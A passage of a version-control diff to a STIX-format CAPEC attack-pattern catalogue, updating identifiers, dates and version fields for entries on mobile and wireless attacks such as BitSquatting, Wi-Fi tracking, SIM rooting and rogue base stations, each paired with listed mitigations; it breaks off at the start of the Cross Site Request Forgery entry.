mobile technology traffic (data flows or signaling data) to disrupt communications or conduct additional surveillance operations.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", - "modified": "2017-08-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -36635,42 +37287,43 @@ "Modify Data (Attackers can inject false data into data or signaling system data flows of communications and operations, or re-route data flows or signaling data for the purpose of further data intercept and capture.)" ] }, - "x_capec_abstraction": "Detailed", + "x_capec_abstraction": "Standard", "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--c16529f2-a1a7-4051-8307-44705a9917fe" + "id": "attack-pattern--24db550f-2f72-42a7-ba11-0050f9180eaa" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", - "modified": "2017-08-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-610-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Commercial defensive technology to detect and alert to any attempts to modify mobile technology data flows or to inject new data into existing data flows and signaling data.", "type": "course-of-action", - "id": "course-of-action--193f80b5-6e2d-4e2e-ae67-28f008850424" + "id": "course-of-action--bb6c6e5d-5144-4ef1-8f27-669fe1fddc21" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", - "modified": "2017-08-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--9d1c3e5b-a19b-4f07-bbe9-3a66cacc8034", - "source_ref": "course-of-action--193f80b5-6e2d-4e2e-ae67-28f008850424", + "id": "relationship--b12d3857-9aea-4d9b-b610-b8f2ab7a77ef", + "source_ref": "course-of-action--bb6c6e5d-5144-4ef1-8f27-669fe1fddc21", "relationship_type": "mitigates", - "target_ref": "attack-pattern--c16529f2-a1a7-4051-8307-44705a9917fe" + "target_ref": "attack-pattern--24db550f-2f72-42a7-ba11-0050f9180eaa" }, { "name": "BitSquatting", "description": "An adversary registers a domain name one bit different than a trusted domain. A BitSquatting attack leverages random errors in memory to direct Internet traffic to adversary-controlled destinations. BitSquatting requires no exploitation or complicated reverse engineering, and is operating system and architecture agnostic. Experimental observations show that BitSquatting popular websites could redirect non-trivial amounts of Internet traffic to a malicious entity.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -36702,65 +37355,66 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--56861ccd-e1c5-4bab-a3db-5ad2b0639c1e" + "id": "attack-pattern--4a2bd25a-02bc-4716-86e7-6ea7494b9c82" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-611-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Authenticate all servers and perform redundant checks when using DNS hostnames.", "type": "course-of-action", - "id": "course-of-action--460bc4f1-e5e3-4d50-a18e-21581d793898" + "id": "course-of-action--d5c9990e-fec4-4e5e-a4bd-07a832e34a43" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--3121cde5-d798-473f-bfb6-f79b61932995", - "source_ref": "course-of-action--460bc4f1-e5e3-4d50-a18e-21581d793898", + "id": "relationship--3327631e-c3c1-46cc-a867-cedd139c58a0", + "source_ref": "course-of-action--d5c9990e-fec4-4e5e-a4bd-07a832e34a43", "relationship_type": "mitigates", - "target_ref": "attack-pattern--56861ccd-e1c5-4bab-a3db-5ad2b0639c1e" + "target_ref": "attack-pattern--4a2bd25a-02bc-4716-86e7-6ea7494b9c82" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-611-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "When possible, use error-correcting (ECC) memory in local devices as non-ECC memory is significantly more vulnerable to faults.", "type": "course-of-action", - "id": "course-of-action--70c0c474-8eef-4c23-afa4-2733e53ebe26" + "id": "course-of-action--5f333309-dde8-4d92-b47c-92de9653c262" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--435c8ca7-dee5-4ea6-b529-25712f9c9d44", - "source_ref": "course-of-action--70c0c474-8eef-4c23-afa4-2733e53ebe26", + "id": "relationship--a459d059-1af8-49fa-b08d-8a57a8d1be8c", + "source_ref": "course-of-action--5f333309-dde8-4d92-b47c-92de9653c262", "relationship_type": "mitigates", - "target_ref": "attack-pattern--56861ccd-e1c5-4bab-a3db-5ad2b0639c1e" + "target_ref": "attack-pattern--4a2bd25a-02bc-4716-86e7-6ea7494b9c82" }, { "name": "WiFi MAC Address Tracking", "description": "In this attack scenario, the attacker passively listens for WiFi messages and logs the associated Media Access Control (MAC) addresses. These addresses are intended to be unique to each wireless device (although they can be configured and changed by software). Once the attacker is able to associate a MAC address with a particular user or set of users (for example, when attending a public event), the attacker can then scan for that MAC address to track that user in the future.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -36790,68 +37444,69 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--3c8e2540-4901-4d94-975f-c3057746d3fe" + "id": "attack-pattern--70cee10e-762f-49df-bd81-d972d3dd7c11" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-612-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Automatic randomization of WiFi MAC addresses", "type": "course-of-action", - "id": "course-of-action--c576578e-3c63-422b-991d-7f7034b366b0" + "id": "course-of-action--a0e7a602-41ad-4d2b-91ab-2d7d76608c7b" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--db7e3295-fae4-4f41-b2c5-47a10fbfb55c", - "source_ref": "course-of-action--c576578e-3c63-422b-991d-7f7034b366b0", + "id": "relationship--745195e4-fadd-4751-b1e3-844097302f3a", + "source_ref": "course-of-action--a0e7a602-41ad-4d2b-91ab-2d7d76608c7b", "relationship_type": "mitigates", - "target_ref": "attack-pattern--3c8e2540-4901-4d94-975f-c3057746d3fe" + "target_ref": "attack-pattern--70cee10e-762f-49df-bd81-d972d3dd7c11" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-612-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Frequent changing of handset and retransmission device", "type": "course-of-action", - "id": "course-of-action--0295e8fb-8248-496c-a4ce-f28f2ee591e5" + "id": "course-of-action--a2252944-e402-49b9-aedf-9c19aea7d0af" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a12bad6e-657a-49a2-9b72-81c5e7deb1ca", - "source_ref": "course-of-action--0295e8fb-8248-496c-a4ce-f28f2ee591e5", + "id": "relationship--78ebf4ad-2c8b-4125-96ec-04f668043e85", + "source_ref": "course-of-action--a2252944-e402-49b9-aedf-9c19aea7d0af", "relationship_type": "mitigates", - "target_ref": "attack-pattern--3c8e2540-4901-4d94-975f-c3057746d3fe" + "target_ref": "attack-pattern--70cee10e-762f-49df-bd81-d972d3dd7c11" }, { "name": "WiFi SSID Tracking", "description": "In this attack scenario, the attacker passively listens for WiFi management frame messages containing the Service Set Identifier (SSID) for the WiFi network. These messages are frequently transmitted by WiFi access points (e.g., the retransmission device) as well as by clients that are accessing the network (e.g., the handset/mobile device). Once the attacker is able to associate an SSID with a particular user or set of users (for example, when attending a public event), the attacker can then scan for this SSID to track that user in the future.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -36878,68 +37533,69 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--89ec3300-b4bb-4784-bcb1-d09f06602213" + "id": "attack-pattern--fcbaba82-a505-427a-89f0-0284785340fd" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-613-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], - "description": "Do not enable the feature of \"Hidden SSIDs\u201d (also known as \u201cNetwork Cloaking\u201d) \u2013 this option disables the usual broadcasting of the SSID by the access point, but forces the mobile handset to send requests on all supported radio channels which contains the SSID. The result is that tracking of the mobile device becomes easier since it is transmitting the SSID more frequently.", + "description": "Do not enable the feature of \"Hidden SSIDs\" (also known as \"Network Cloaking\") \u2013 this option disables the usual broadcasting of the SSID by the access point, but forces the mobile handset to send requests on all supported radio channels which contains the SSID. The result is that tracking of the mobile device becomes easier since it is transmitting the SSID more frequently.", "type": "course-of-action", - "id": "course-of-action--bc0d8348-5552-40a2-afbf-1ec9e50d997d" + "id": "course-of-action--6cc43be3-26c7-4a02-93c6-bd3346e0758c" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--1dba12f7-0ef3-42c6-b7a1-3ecfa7de175b", - "source_ref": "course-of-action--bc0d8348-5552-40a2-afbf-1ec9e50d997d", + "id": "relationship--dc0386a5-c653-4bb9-8148-ba86b01e0a0f", + "source_ref": "course-of-action--6cc43be3-26c7-4a02-93c6-bd3346e0758c", "relationship_type": "mitigates", - "target_ref": "attack-pattern--89ec3300-b4bb-4784-bcb1-d09f06602213" + "target_ref": "attack-pattern--fcbaba82-a505-427a-89f0-0284785340fd" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-613-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Frequently change the SSID to new and unrelated values", "type": "course-of-action", - "id": "course-of-action--5e16f1ce-502b-4fc6-b488-5c24b2fa9858" + "id": "course-of-action--b0488086-27d5-47fc-bbdb-513ead0387b1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--97fcae95-0c3a-4151-951e-38551512dd65", - "source_ref": "course-of-action--5e16f1ce-502b-4fc6-b488-5c24b2fa9858", + "id": "relationship--3725b37e-cb09-4e19-bfd4-673f83aa8632", + "source_ref": "course-of-action--b0488086-27d5-47fc-bbdb-513ead0387b1", "relationship_type": "mitigates", - "target_ref": "attack-pattern--89ec3300-b4bb-4784-bcb1-d09f06602213" + "target_ref": "attack-pattern--fcbaba82-a505-427a-89f0-0284785340fd" }, { "name": "Rooting SIM Cards", "description": "SIM cards are the de facto trust anchor of mobile devices worldwide. The cards protect the mobile identity of subscribers, associate devices with phone numbers, and increasingly store payment credentials, for example in NFC-enabled phones with mobile wallets. This attack leverages over-the-air (OTA) updates deployed via cryptographically-secured SMS messages to deliver executable code to the SIM. By cracking the DES key, an attacker can send properly signed binary SMS messages to a device, which are treated as Java applets and are executed on the SIM. These applets are allowed to send SMS, change voicemail numbers, and query the phone location, among many other predefined functions. These capabilities alone provide plenty of potential for abuse.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -36975,43 +37631,44 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--522275ae-2511-462e-980c-7d65c1cfba45" + "id": "attack-pattern--9d2b2f02-aa84-4ed1-8fb9-e0ee9f5fabc2" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-614-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Upgrade the SIM card to use the state-of-the-art AES or the somewhat outdated 3DES algorithm for OTA.", "type": "course-of-action", - "id": "course-of-action--3f041cbe-8b16-464c-8be6-09663ab3142b" + "id": "course-of-action--3083373d-daa1-4da5-b255-b68e35ada6f3" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--11b34d87-bbbd-4172-9b49-cc95afb53fa1", - "source_ref": "course-of-action--3f041cbe-8b16-464c-8be6-09663ab3142b", + "id": "relationship--4def2e05-a5c8-42b8-88f5-3e10020490fa", + "source_ref": "course-of-action--3083373d-daa1-4da5-b255-b68e35ada6f3", "relationship_type": "mitigates", - "target_ref": "attack-pattern--522275ae-2511-462e-980c-7d65c1cfba45" + "target_ref": "attack-pattern--9d2b2f02-aa84-4ed1-8fb9-e0ee9f5fabc2" }, { "name": "Evil Twin Wi-Fi Attack", - "description": "Adversaries install Wi-Fi equipment that acts as a legitimate Wi-Fi network access point. When a device connects to this access point, Wi-Fi data traffic is intercepted, captured, and analyzed. This also allows the adversary to act as a \u201cman-in-the-middle\u201d for all communications.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "description": "Adversaries install Wi-Fi equipment that acts as a legitimate Wi-Fi network access point. When a device connects to this access point, Wi-Fi data traffic is intercepted, captured, and analyzed. This also allows the adversary to act as a \"man-in-the-middle\" for all communications.", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -37035,40 +37692,41 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--2d72b60d-f4d6-4c1b-86a1-99a43ac29b25" + "id": "attack-pattern--be7174ed-bde2-48ea-aa7d-bc9a7444efff" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-615-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Commercial defensive technology that monitors for rogue Wi-Fi access points, man-in-the-middle attacks, and anomalous activity with the mobile device baseband radios.", "type": "course-of-action", - "id": "course-of-action--3ff398a8-73f3-41d0-8747-3b95694240f5" + "id": "course-of-action--513e1a8c-8153-40c3-8452-672f95b31666" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--7741126e-4c7a-47f0-93af-ea065225418b", - "source_ref": "course-of-action--3ff398a8-73f3-41d0-8747-3b95694240f5", + "id": "relationship--f3536738-ef95-497f-9419-9e845e1a4fe3", + "source_ref": "course-of-action--513e1a8c-8153-40c3-8452-672f95b31666", "relationship_type": "mitigates", - "target_ref": "attack-pattern--2d72b60d-f4d6-4c1b-86a1-99a43ac29b25" + "target_ref": "attack-pattern--be7174ed-bde2-48ea-aa7d-bc9a7444efff" }, { "name": "Establish Rogue Location", "description": "An adversary provides a malicious version of a resource at a location that is similar to the expected location of a legitimate resource. After establishing the rogue location, the adversary waits for a victim to visit the location and access the malicious resource.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", @@ -37102,18 +37760,19 @@ }, "x_capec_abstraction": "Standard", "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--f35d59dc-b3a1-43a6-9dc2-bad23cb26e65" + "id": "attack-pattern--6dec6b3f-ecca-4764-af25-8db5ed7373a0" }, { "name": "Cellular Rogue Base Station", - "description": "In this attack scenario, the attacker imitates a cellular base station with his own \u201crogue\u201d base station equipment. Since cellular devices connect to whatever station has the strongest signal, the attacker can easily convince a targeted cellular device (e.g. the retransmission device) to talk to the rogue base station.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "description": "In this attack scenario, the attacker imitates a cellular base station with his own \"rogue\" base station equipment. Since cellular devices connect to whatever station has the strongest signal, the attacker can easily convince a targeted cellular device (e.g. the retransmission device) to talk to the rogue base station.", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -37135,40 +37794,41 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--4374f5d6-3347-45f1-a7b4-6dcc68e2dcb5" + "id": "attack-pattern--0e301650-cbba-4113-9bfd-fb9b637d40c3" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-617-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Passively monitor cellular network connection for real-time threat detection and logging for manual review.", "type": "course-of-action", - "id": "course-of-action--dd298ed8-6d3c-4795-88af-dafa847450bc" + "id": "course-of-action--dfb8c9ec-2f27-4bdd-a86b-e89823d238d8" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--bc88c7a2-f1e1-47d1-b784-ad504b9a0bb1", - "source_ref": "course-of-action--dd298ed8-6d3c-4795-88af-dafa847450bc", + "id": "relationship--040e879b-8793-4135-b210-1c25ea56c4a7", + "source_ref": "course-of-action--dfb8c9ec-2f27-4bdd-a86b-e89823d238d8", "relationship_type": "mitigates", - "target_ref": "attack-pattern--4374f5d6-3347-45f1-a7b4-6dcc68e2dcb5" + "target_ref": "attack-pattern--0e301650-cbba-4113-9bfd-fb9b637d40c3" }, { "name": "Cellular Broadcast Message Request", "description": "In this attack scenario, the attacker uses knowledge of the target\u2019s mobile phone number (i.e., the number associated with the SIM used in the retransmission device) to cause the cellular network to send broadcast messages to alert the mobile device. Since the network knows which cell tower the target\u2019s mobile device is attached to, the broadcast messages are only sent in the Location Area Code (LAC) where the target is currently located. By triggering the cellular broadcast message and then listening for the presence or absence of that message, an attacker could verify that the target is in (or not in) a given location.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -37204,40 +37864,41 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--2e858eda-a01b-46a8-9af2-164eacaa61ca" + "id": "attack-pattern--7b1c66c0-d2c1-4283-910e-dc80f0dd53ff" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-618-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Frequent changing of mobile number.", "type": "course-of-action", - "id": "course-of-action--843707e1-d774-4d48-9fbb-6382589511c3" + "id": "course-of-action--166fe84f-a603-45c3-99ba-785be6639265" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--f9df0aec-cf40-49da-aff7-6107f7c4cc7d", - "source_ref": "course-of-action--843707e1-d774-4d48-9fbb-6382589511c3", + "id": "relationship--d6a3f662-340c-48f9-b5b2-a29dea44f063", + "source_ref": "course-of-action--166fe84f-a603-45c3-99ba-785be6639265", "relationship_type": "mitigates", - "target_ref": "attack-pattern--2e858eda-a01b-46a8-9af2-164eacaa61ca" + "target_ref": "attack-pattern--7b1c66c0-d2c1-4283-910e-dc80f0dd53ff" }, { "name": "Signal Strength Tracking", "description": "In this attack scenario, the attacker passively monitors the signal strength of the target\u2019s cellular RF signal or WiFi RF signal and uses the strength of the signal (with directional antennas and/or from multiple listening points at once) to identify the source location of the signal. Obtaining the signal of the target can be accomplished through multiple techniques such as through Cellular Broadcast Message Request or through the use of IMSI Tracking or WiFi MAC Address Tracking.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -37259,15 +37920,16 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--df5cde5a-0cfa-45d8-adba-6c0862a09708" + "id": "attack-pattern--ffc91151-400c-4a94-a854-0c7c73d162de" }, { "name": "Cross Site Request Forgery", "description": "An attacker 